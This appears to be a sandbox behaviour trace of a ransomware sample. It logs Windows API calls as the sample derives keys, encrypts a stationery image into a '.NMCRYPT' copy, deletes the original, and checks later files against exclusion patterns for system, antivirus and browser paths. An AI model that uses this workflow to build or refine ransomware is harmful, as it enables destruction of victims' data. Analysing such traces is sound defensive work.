[0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.146] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.147] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.147] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0164.147] CryptHashData (hHash=0x9ad338, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.147] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad678) returned 1 [0164.147] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0164.147] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0164.147] wcslen (_String="\\\\?\\") returned 0x4 [0164.147] CryptDuplicateKey (in: hKey=0x9ad678, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad778) returned 1 [0164.147] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0164.148] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0164.148] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2950) returned 1 [0164.148] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0164.148] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.149] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.149] GetLastError () returned 0x0 [0164.149] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.764] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.764] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.764] GetLastError () returned 0x0 [0164.764] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.764] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.764] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.764] GetLastError () returned 0x0 [0164.764] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.764] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.764] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.764] GetLastError () returned 0x0 [0164.764] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.764] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.764] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.764] GetLastError () returned 0x0 [0164.764] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.764] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.764] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.764] GetLastError () returned 0x0 [0164.764] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.764] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.765] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.765] GetLastError () returned 0x0 [0164.765] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.765] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.765] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.765] GetLastError () returned 0x0 [0164.765] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.765] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.765] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.765] GetLastError () returned 0x0 [0164.765] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.765] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.765] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.765] GetLastError () returned 0x0 [0164.765] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.765] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.765] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.765] GetLastError () returned 0x0 [0164.765] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.765] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x86, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x86, lpOverlapped=0x0) returned 1 [0164.765] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x86, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x90) returned 1 [0164.765] GetLastError () returned 0x0 [0164.765] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x90, lpOverlapped=0x0) returned 1 [0164.765] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0164.765] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0164.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg")) returned 0x20 [0164.766] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg", dwFileAttributes=0x20) returned 0 [0164.766] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg") returned 1 [0164.766] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg")) returned 0 [0164.766] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg" [0164.766] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0164.766] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF70B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf70b.tmp")) returned 0xf70b [0164.773] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF70B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf70b.tmp"), dwFlags=0x1) returned 0 [0164.773] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF70B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf70b.tmp")) returned 1 [0164.774] CryptDestroyKey (hKey=0x9ad778) returned 1 [0164.774] wcslen (_String="OK") returned 0x2 [0164.774] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.774] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.774] CryptDestroyKey (hKey=0x9ad678) returned 1 [0164.774] CryptDestroyHash (hHash=0x9ad338) returned 1 [0164.774] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0164.774] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*NMCRYPT") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*Recovers your files.html") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*.exe") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*.dll") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*.lnk") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*.bat") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*.ini") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*.msi") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*.scf") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*pagefile.sys*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*NTUSER.DAT*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*AppData*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*\\winrar\\*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*\\Internet Explorer\\*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*\\java\\*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*\\TeamViewer\\*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*\\windows\\*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*\\ESET\\*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*\\AVG\\*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*\\AVIRA\\*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*\\AVAST Software\\*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*Atheros*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*Realtek*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*bootmgr*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*boot*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*boot*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*CONFIG.SYS*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*IO.SYS*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*MSDOS.SYS*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*NTDETECT.COM*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*ntldr*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*chrome*") returned 0 [0164.774] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*opera*") returned 0 [0164.775] PathMatchSpecW (pszFile="Orange Circles.htm", pszSpec="*firefox*") returned 0 [0164.775] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm", pszSpec="*") returned 1 